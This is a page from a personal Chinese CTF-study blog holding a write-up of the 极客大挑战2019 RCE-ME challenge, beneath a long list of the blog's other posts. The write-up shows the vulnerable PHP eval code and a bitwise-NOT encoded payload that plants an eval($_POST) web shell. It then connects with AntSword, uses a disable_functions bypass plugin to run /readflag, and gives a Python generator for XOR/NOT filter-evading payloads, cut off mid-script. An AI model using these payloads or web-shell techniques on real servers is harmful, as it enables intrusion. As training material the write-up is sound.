           href="/2025/03/16/ssrf/"
           data-tag="学习笔记,ssrf"
           data-author="" >
            <span class="post-title" title="ssrf">ssrf</span>
            <span class="post-date" title="2025-03-16 21:44:06">2025/03/16</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/14/ctfshow-php%E5%BA%8F%E5%88%97%E5%8C%96/"
           data-tag="学习笔记,php反序列化"
           data-author="" >
            <span class="post-title" title="ctfshow-php序列化">ctfshow-php序列化</span>
            <span class="post-date" title="2025-03-14 22:11:16">2025/03/14</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/14/GXYCTF2019-BabySQli1/"
           data-tag="刷题笔记,sql注入"
           data-author="" >
            <span class="post-title" title="GXYCTF2019-BabySQli1">GXYCTF2019-BabySQli1</span>
            <span class="post-date" title="2025-03-14 20:44:55">2025/03/14</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/13/%E7%BD%91%E9%BC%8E%E6%9D%AF2020%E9%9D%92%E9%BE%99%E7%BB%84-AreUSerialz1/"
           data-tag="刷题笔记,文件包含,php反序列化"
           data-author="" >
            <span class="post-title" title="网鼎杯2020青龙组-AreUSerialz1">网鼎杯2020青龙组-AreUSerialz1</span>
            <span class="post-date" title="2025-03-13 23:36:35">2025/03/13</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/13/ZJCTF2019-NiZhuanSiWei1/"
           data-tag="刷题笔记,文件包含"
           data-author="" >
            <span class="post-title" title="ZJCTF2019-NiZhuanSiWei1">ZJCTF2019-NiZhuanSiWei1</span>
            <span class="post-date" title="2025-03-13 20:39:05">2025/03/13</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/12/RoarCTF2019-EasyCalc1/"
           data-tag="刷题笔记,命令执行,waf绕过"
           data-author="" >
            <span class="post-title" title="RoarCTF2019-EasyCalc1">RoarCTF2019-EasyCalc1</span>
            <span class="post-date" title="2025-03-12 19:36:00">2025/03/12</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/11/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019-HardSQL1/"
           data-tag="刷题笔记,sql注入,报错注入"
           data-author="" >
            <span class="post-title" title="极客大挑战2019-HardSQL1">极客大挑战2019-HardSQL1</span>
            <span class="post-date" title="2025-03-11 15:31:27">2025/03/11</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/11/%E5%BC%BA%E7%BD%91%E6%9D%AF2019-%E9%9A%8F%E4%BE%BF%E6%B3%A81/"
           data-tag="刷题笔记,sql注入,堆叠注入"
           data-author="" >
            <span class="post-title" title="强网杯2019-随便注1">强网杯2019-随便注1</span>
            <span class="post-date" title="2025-03-11 00:07:32">2025/03/11</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/08/ctfshow-sqli-labs/"
           data-tag="学习笔记,sql注入"
           data-author="" >
            <span class="post-title" title="ctfshow-sqli-labs">ctfshow-sqli-labs</span>
            <span class="post-date" title="2025-03-08 17:51:18">2025/03/08</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/04/ctfshow-sql%E6%B3%A8%E5%85%A5/"
           data-tag="学习笔记,sql注入"
           data-author="" >
            <span class="post-title" title="ctfshow-sql注入">ctfshow-sql注入</span>
            <span class="post-date" title="2025-03-04 23:42:23">2025/03/04</span>
        </a>
        
        
        <a  class="All "
           href="/2025/03/02/php%E7%89%B9%E6%80%A7/"
           data-tag="php特性,学习笔记"
           data-author="" >
            <span class="post-title" title="php特性">php特性</span>
            <span class="post-date" title="2025-03-02 20:14:41">2025/03/02</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/24/ctfshow-php%E7%89%B9%E6%80%A7/"
           data-tag="php特性,学习笔记"
           data-author="" >
            <span class="post-title" title="ctfshow-php特性">ctfshow-php特性</span>
            <span class="post-date" title="2025-02-24 18:53:16">2025/02/24</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/23/ctfshow-xss/"
           data-tag="学习笔记,xss"
           data-author="" >
            <span class="post-title" title="ctfshow-xss">ctfshow-xss</span>
            <span class="post-date" title="2025-02-23 17:12:49">2025/02/23</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/23/ctfshow-%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/"
           data-tag="学习笔记,信息搜集"
           data-author="" >
            <span class="post-title" title="ctfshow-信息搜集">ctfshow-信息搜集</span>
            <span class="post-date" title="2025-02-23 15:24:36">2025/02/23</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/17/ctfshow-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/"
           data-tag="学习笔记,命令执行"
           data-author="" >
            <span class="post-title" title="ctfshow-命令执行">ctfshow-命令执行</span>
            <span class="post-date" title="2025-02-17 00:00:48">2025/02/17</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/14/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/"
           data-tag="学习笔记,PHP反序列化漏洞"
           data-author="" >
            <span class="post-title" title="PHP反序列化">PHP反序列化</span>
            <span class="post-date" title="2025-02-14 00:51:53">2025/02/14</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/12/xss%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/"
           data-tag="学习笔记,xss漏洞"
           data-author="" >
            <span class="post-title" title="xss漏洞总结">xss漏洞总结</span>
            <span class="post-date" title="2025-02-12 03:30:15">2025/02/12</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/11/xss-labs/"
           data-tag="学习笔记,xss漏洞"
           data-author="" >
            <span class="post-title" title="xss-labs">xss-labs</span>
            <span class="post-date" title="2025-02-11 23:43:19">2025/02/11</span>
        </a>
        
        
        <a  class="All "
           href="/2025/02/01/linux%E5%9F%BA%E7%A1%80%E5%91%BD%E4%BB%A4/"
           data-tag="学习笔记,linux"
           data-author="" >
            <span class="post-title" title="linux基础命令">linux基础命令</span>
            <span class="post-date" title="2025-02-01 22:14:44">2025/02/01</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/29/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/"
           data-tag="学习笔记,命令执行"
           data-author="" >
            <span class="post-title" title="命令执行">命令执行</span>
            <span class="post-date" title="2025-01-29 22:54:38">2025/01/29</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/29/ctfshow-web82/"
           data-tag="文件包含,做题笔记"
           data-author="" >
            <span class="post-title" title="ctfshow-web82">ctfshow-web82</span>
            <span class="post-date" title="2025-01-29 04:36:22">2025/01/29</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/29/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/"
           data-tag="文件包含,学习笔记"
           data-author="" >
            <span class="post-title" title="文件包含漏洞总结">文件包含漏洞总结</span>
            <span class="post-date" title="2025-01-29 02:22:55">2025/01/29</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/26/ctfshow-web160/"
           data-tag="文件上传,做题笔记,日志包含"
           data-author="" >
            <span class="post-title" title="[ctfshow]web160">[ctfshow]web160</span>
            <span class="post-date" title="2025-01-26 16:37:35">2025/01/26</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/26/buuctf%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98upload/"
           data-tag="文件上传,做题笔记"
           data-author="" >
            <span class="post-title" title="buuctf极客大挑战upload">buuctf极客大挑战upload</span>
            <span class="post-date" title="2025-01-26 16:36:39">2025/01/26</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/22/upload/"
           data-tag="文件上传,学习笔记"
           data-author="" >
            <span class="post-title" title="upload">upload</span>
            <span class="post-date" title="2025-01-22 15:22:47">2025/01/22</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/19/python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/"
           data-tag="学习笔记,python"
           data-author="" >
            <span class="post-title" title="python学习笔记">python学习笔记</span>
            <span class="post-date" title="2025-01-19 01:39:35">2025/01/19</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/09/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019Http/"
           data-tag="刷题笔记,http协议"
           data-author="" >
            <span class="post-title" title="极客大挑战2019Http">极客大挑战2019Http</span>
            <span class="post-date" title="2025-01-09 16:47:44">2025/01/09</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/09/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019SecretFile/"
           data-tag="刷题笔记,filter伪协议"
           data-author="" >
            <span class="post-title" title="极客大挑战2019SecretFile">极客大挑战2019SecretFile</span>
            <span class="post-date" title="2025-01-09 01:36:08">2025/01/09</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/05/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019LoveSQL/"
           data-tag="刷题笔记,sql注入"
           data-author="" >
            <span class="post-title" title="极客大挑战2019LoveSQL">极客大挑战2019LoveSQL</span>
            <span class="post-date" title="2025-01-05 20:00:42">2025/01/05</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/05/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019Havefun/"
           data-tag="刷题笔记,payload构造"
           data-author="" >
            <span class="post-title" title="极客大挑战2019Havefun">极客大挑战2019Havefun</span>
            <span class="post-date" title="2025-01-05 19:35:48">2025/01/05</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/05/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019EasySQL/"
           data-tag="刷题笔记,sql注入"
           data-author="" >
            <span class="post-title" title="极客大挑战2019EasySQL">极客大挑战2019EasySQL</span>
            <span class="post-date" title="2025-01-05 19:10:32">2025/01/05</span>
        </a>
        
        
        <a  class="All "
           href="/2025/01/03/sql%E6%B3%A8%E5%85%A5/"
           data-tag="学习笔记,sql注入"
           data-author="" >
            <span class="post-title" title="sql注入">sql注入</span>
            <span class="post-date" title="2025-01-03 21:14:16">2025/01/03</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/29/MySQL/"
           data-tag="学习笔记,MySQL"
           data-author="" >
            <span class="post-title" title="MySQL">MySQL</span>
            <span class="post-date" title="2024-12-29 19:30:51">2024/12/29</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/28/php%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F%E7%AC%94%E8%AE%B0/"
           data-tag="学习笔记,正则表达式"
           data-author="" >
            <span class="post-title" title="正则表达式笔记">正则表达式笔记</span>
            <span class="post-date" title="2024-12-28 20:46:55">2024/12/28</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/26/PHP%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/"
           data-tag="学习笔记,php"
           data-author="" >
            <span class="post-title" title="PHP学习笔记">PHP学习笔记</span>
            <span class="post-date" title="2024-12-26 23:50:15">2024/12/26</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/25/HTML%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/"
           data-tag="学习笔记,HTML"
           data-author="" >
            <span class="post-title" title="HTML学习笔记">HTML学习笔记</span>
            <span class="post-date" title="2024-12-25 23:54:00">2024/12/25</span>
        </a>
        
        
        <a  class="All "
           href="/2024/12/25/welcome/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="welcome">welcome</span>
            <span class="post-date" title="2024-12-25 20:38:33">2024/12/25</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="Toggle full screen shortcut key s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-极客大挑战2019-RCE-ME" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">极客大挑战2019-RCE-ME</h1>
    
    <div class="article-meta">
        
        
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color5">刷题笔记</a>
            
            <a class="color4">无字母数字RCE</a>
            
            <a class="color5">异或绕过</a>
            
            <a class="color5">取反绕过</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            Created At : <time class="date" title='Updated At: 2025-03-30 16:18:56'>2025-03-29 01:33</time>
        
    </div>
    <div class="article-meta">
        
        <span>Count:1.1k</span>
        
        
        <span id="busuanzi_container_page_pv">
            Views 👀 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
        <span class="top-comment" title="Jump to comment area">
            <a href="#comments">
                Comment:<span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </a>
        </span>
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019-RCE-ME"><span class="toc-text">极客大挑战2019-RCE-ME</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%82%E6%88%96%E5%8F%96%E5%8F%8D%E8%84%9A%E6%9C%AC"><span class="toc-text">异或取反脚本</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="极客大挑战2019-RCE-ME"><a href="#极客大挑战2019-RCE-ME" class="headerlink" title="极客大挑战2019-RCE-ME"></a>极客大挑战2019-RCE-ME</h1><p>源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;code&#x27;</span>]))&#123;<br>            <span class="hljs-variable">$code</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;code&#x27;</span>];<br>                    <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$code</span>)&gt;<span class="hljs-number">40</span>)&#123;<br>                                        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;This is too Long.&quot;</span>);<br>                                                &#125;<br>                    <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;/[A-Za-z0-9]+/&quot;</span>,<span class="hljs-variable">$code</span>))&#123;<br>                                        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;NO.&quot;</span>);<br>                                                &#125;<br>                    @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$code</span>);<br>&#125;<br><span class="hljs-keyword">else</span>&#123;<br>            <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br>&#125;<br><br><span class="hljs-comment">// ?&gt;</span><br></code></pre></td></tr></table></figure>

<p>很明显要我们利用危险函数eval进行命令执行来得到flag，并且这里还过滤掉了数字和字母，且我们GET传参的值要小于40个字符。</p>
<p>我们这里使用取反绕过<br>构造命令<code>assert(eval($_POST[1]););</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><br><span class="hljs-variable">$system</span>=<span class="hljs-string">&quot;assert&quot;</span>;<br><span class="hljs-variable">$command</span>=<span class="hljs-string">&#x27;eval($_POST[1]);&#x27;</span>;<br><br><span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;[*] (~&#x27;</span>.<span class="hljs-title function_ invoke__">urlencode</span>(~<span class="hljs-variable">$system</span>).<span class="hljs-string">&#x27;)(~&#x27;</span>.<span class="hljs-title function_ invoke__">urlencode</span>(~<span class="hljs-variable">$command</span>).<span class="hljs-string">&#x27;);&#x27;</span>;<br><br></code></pre></td></tr></table></figure>

<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs llvm">[*] (~<span class="hljs-variable">%9</span>E<span class="hljs-variable">%8</span>C<span class="hljs-variable">%8</span>C<span class="hljs-variable">%9</span>A<span class="hljs-variable">%8</span>D<span class="hljs-variable">%8</span>B)(~<span class="hljs-variable">%9</span>A<span class="hljs-variable">%89</span><span class="hljs-variable">%9</span>E<span class="hljs-variable">%93</span><span class="hljs-variable">%D7</span><span class="hljs-variable">%DB</span><span class="hljs-variable">%A0</span><span class="hljs-variable">%AF</span><span class="hljs-variable">%B0</span><span class="hljs-variable">%AC</span><span class="hljs-variable">%AB</span><span class="hljs-variable">%A4</span><span class="hljs-variable">%CE</span><span class="hljs-variable">%A2</span><span class="hljs-variable">%D6</span><span class="hljs-variable">%C4</span>)<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure>

<p>payload：</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs llvm">url/?code<span class="hljs-operator">=</span>(~<span class="hljs-variable">%9</span>E<span class="hljs-variable">%8</span>C<span class="hljs-variable">%8</span>C<span class="hljs-variable">%9</span>A<span class="hljs-variable">%8</span>D<span class="hljs-variable">%8</span>B)(~<span class="hljs-variable">%9</span>A<span class="hljs-variable">%89</span><span class="hljs-variable">%9</span>E<span class="hljs-variable">%93</span><span class="hljs-variable">%D7</span><span class="hljs-variable">%DB</span><span class="hljs-variable">%A0</span><span class="hljs-variable">%AF</span><span class="hljs-variable">%B0</span><span class="hljs-variable">%AC</span><span class="hljs-variable">%AB</span><span class="hljs-variable">%A4</span><span class="hljs-variable">%CE</span><span class="hljs-variable">%A2</span><span class="hljs-variable">%D6</span><span class="hljs-variable">%C4</span>)<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure>

<p>然后用蚁剑连接，成功连接</p>
<p>发现一个flag文件和readflag文件，但是flag文件内什么都没有，readflag文件直接打开全是乱码</p>
<p>并且无法执行命令</p>
<p>这个时候访问下phpinfo()查看下配置就会发现，在disable_function内禁用了很大部分函数，在终端也因此执行不了操作。</p>
<hr>
<p>这时我们可以使用蚁剑提供了可以用来绕过的插件(XD)disable_function</p>
<p><img src="/../image/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019-RCE-ME-1.png"></p>
<p>模式选择php7_GC_UAF</p>
<p>然后在shell里执行</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">/readflag<br></code></pre></td></tr></table></figure>

<p>得到flag</p>
<p><img src="/../image/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019-RCE-ME-2.png"></p>
<hr>
<h2 id="异或取反脚本"><a href="#异或取反脚本" class="headerlink" title="异或取反脚本"></a>异或取反脚本</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#blacklist列表中的字符在生成的拼接字符串中不会被使用,除了部分是被过滤掉的字符，其余的如&#x27;,&quot;等字符考虑可能会导致闭合等问题暂列入</span><br><span class="hljs-comment">#如果有其他的要求可以对blacklist列表进行删改</span><br>blacklist=[<span class="hljs-string">&quot;`&quot;</span>,<span class="hljs-string">&quot;&#x27;&quot;</span>,<span class="hljs-string">&#x27;&quot;&#x27;</span>,<span class="hljs-string">&quot;\\&quot;</span><span class="hljs-string">&quot;0&quot;</span>,<span class="hljs-string">&quot;1&quot;</span>,<span class="hljs-string">&quot;2&quot;</span>,<span class="hljs-string">&quot;3&quot;</span>,<span class="hljs-string">&quot;4&quot;</span>,<span class="hljs-string">&quot;5&quot;</span>,<span class="hljs-string">&quot;6&quot;</span>,<span class="hljs-string">&quot;7&quot;</span>,<span class="hljs-string">&quot;8&quot;</span>,<span class="hljs-string">&quot;9&quot;</span>,<span class="hljs-string">&quot;a&quot;</span>,<span class="hljs-string">&quot;b&quot;</span>,<span class="hljs-string">&quot;c&quot;</span>,<span class="hljs-string">&quot;d&quot;</span>,<span class="hljs-string">&quot;e&quot;</span>,<span class="hljs-string">&quot;f&quot;</span>,<span class="hljs-string">&quot;g&quot;</span>,<span class="hljs-string">&quot;h&quot;</span>,<span class="hljs-string">&quot;i&quot;</span>,<span class="hljs-string">&quot;j&quot;</span>,<span class="hljs-string">&quot;k&quot;</span>,<span class="hljs-string">&quot;l&quot;</span>,<span class="hljs-string">&quot;m&quot;</span>,<span class="hljs-string">&quot;n&quot;</span>,<span class="hljs-string">&quot;o&quot;</span>,<span class="hljs-string">&quot;p&quot;</span>,<span class="hljs-string">&quot;q&quot;</span>,<span class="hljs-string">&quot;r&quot;</span>,<span class="hljs-string">&quot;s&quot;</span>,<span class="hljs-string">&quot;t&quot;</span>,<span class="hljs-string">&quot;u&quot;</span>,<span class="hljs-string">&quot;v&quot;</span>,<span class="hljs-string">&quot;w&quot;</span>,<span class="hljs-string">&quot;x&quot;</span>,<span class="hljs-string">&quot;y&quot;</span>,<span class="hljs-string">&quot;z&quot;</span>,<span class="hljs-string">&quot;A&quot;</span>,<span class="hljs-string">&quot;B&quot;</span>,<span class="hljs-string">&quot;C&quot;</span>,<span class="hljs-string">&quot;D&quot;</span>,<span class="hljs-string">&quot;E&quot;</span>,<span class="hljs-string">&quot;F&quot;</span>,<span class="hljs-string">&quot;G&quot;</span>,<span class="hljs-string">&quot;H&quot;</span>,<span class="hljs-string">&quot;I&quot;</span>,<span class="hljs-string">&quot;J&quot;</span>,<span class="hljs-string">&quot;K&quot;</span>,<span class="hljs-string">&quot;L&quot;</span>,<span class="hljs-string">&quot;M&quot;</span>,<span class="hljs-string">&quot;N&quot;</span>,<span class="hljs-string">&quot;O&quot;</span>,<span class="hljs-string">&quot;P&quot;</span>,<span class="hljs-string">&quot;Q&quot;</span>,<span class="hljs-string">&quot;R&quot;</span>,<span class="hljs-string">&quot;S&quot;</span>,<span class="hljs-string">&quot;T&quot;</span>,<span class="hljs-string">&quot;U&quot;</span>,<span class="hljs-string">&quot;V&quot;</span>,<span class="hljs-string">&quot;W&quot;</span>,<span class="hljs-string">&quot;X&quot;</span>,<span class="hljs-string">&quot;Y&quot;</span>,<span class="hljs-string">&quot;Z&quot;</span>]<br><span class="hljs-comment">#不同于取反,一个目标字符串使用异或的方式可以获大量的可用拼接字符串,这里只取了1种组合的拼接字符串</span><br><span class="hljs-comment">#如果需要获得更多拼接字符串查看该函数中的result列表</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">yiHuo</span>(<span class="hljs-params">string</span>):<br>    <span class="hljs-keyword">global</span> operationEffient<br>    <span class="hljs-keyword">global</span> blacklist<br>    operationEffient=<span class="hljs-literal">False</span><br>    result=[]<br>    finalstr=<span class="hljs-string">&#x27;&quot;&quot;^&quot;&quot;&#x27;</span><br>    rawstr=string<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-built_in">len</span>(rawstr)):<br>        result.extend([[]])<br>    <span class="hljs-keyword">for</span> k <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-built_in">len</span>(rawstr)):<br>        <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">32</span>,<span class="hljs-number">255</span>):<br>           <span class="hljs-keyword">if</span>(<span class="hljs-built_in">chr</span>(i) <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> blacklist):<br>                <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">32</span>,<span class="hljs-number">255</span>):<br>                    <span class="hljs-keyword">if</span>(<span class="hljs-built_in">chr</span>(j) <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> blacklist):<br>                        <span class="hljs-keyword">if</span>(i^j==<span class="hljs-built_in">ord</span>(rawstr[k])):<br>                            result[k].extend([[<span class="hljs-built_in">hex</span>(i).replace(<span class="hljs-string">&#x27;0x&#x27;</span>,<span class="hljs-string">&quot;%&quot;</span>),<span class="hljs-built_in">hex</span>(j).replace(<span class="hljs-string">&#x27;0x&#x27;</span>,<span class="hljs-string">&quot;%&quot;</span>)]])<br>    <span class="hljs-comment">#在这里往下的函数部分,result列表均是可用的(已填充了获得的拼接字符串)</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-built_in">len</span>(result)):<br>        <span class="hljs-keyword">if</span>(<span class="hljs-built_in">len</span>(result[i])==<span class="hljs-number">0</span>):<br>            <span class="hljs-keyword">return</span>(<span class="hljs-string">&quot;该字符在现有黑名单下无法拼接出-&gt;%s&quot;</span>%(rawstr[i]))<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-built_in">len</span>(rawstr)):<br>        finalstr=finalstr[:finalstr.find(<span class="hljs-string">&quot;^&quot;</span>,<span class="hljs-number">0</span>)-<span class="hljs-number">1</span>]+result[i][<span class="hljs-number">0</span>][<span class="hljs-number">0</span>]+<span class="hljs-string">&#x27;&quot;&#x27;</span>+finalstr[finalstr.find(<span class="hljs-string">&quot;^&quot;</span>,<span class="hljs-number">0</span>):]<br>        finalstr=finalstr[:finalstr.rfind(<span class="hljs-string">&quot;&#x27;&quot;</span>,<span class="hljs-number">0</span>)]+result[i][<span class="hljs-number">0</span>][<span class="hljs-number">1</span>]+finalstr[finalstr.rfind(<span class="hljs-string">&#x27;&quot;&#x27;</span>,<span class="hljs-number">0</span>):]   <br>    <span class="hljs-keyword">return</span>(finalstr)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">quFan</span>(<span class="hljs-params">string</span>):<br>    <span class="hljs-keyword">global</span> operationEffient<br>    <span class="hljs-keyword">global</span> blacklist<br>    operationEffient=<span class="hljs-literal">False</span><br>    result=[]<br>    finalstr=<span class="hljs-string">&#x27;~&quot;&quot;&#x27;</span><br>    rawstr=string<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-built_in">len</span>(rawstr)):<br>        result.extend([[]])<br>    <span class="hljs-keyword">for</span> k <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-built_in">len</span>(rawstr)):<br>        <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">32</span>,<span class="hljs-number">255</span>):<br>           <span class="hljs-keyword">if</span>(<span class="hljs-built_in">chr</span>(i) <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> blacklist <span class="hljs-keyword">and</span> <span class="hljs-built_in">chr</span>(<span class="hljs-built_in">int</span>(<span class="hljs-built_in">bin</span>(~i &amp; <span class="hljs-number">0xFF</span>)[<span class="hljs-number">2</span>:],<span class="hljs-number">2</span>))==rawstr[k]):<br>               result[k].extend([<span class="hljs-built_in">hex</span>(i).replace(<span class="hljs-string">&#x27;0x&#x27;</span>,<span class="hljs-string">&quot;%&quot;</span>)])<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span 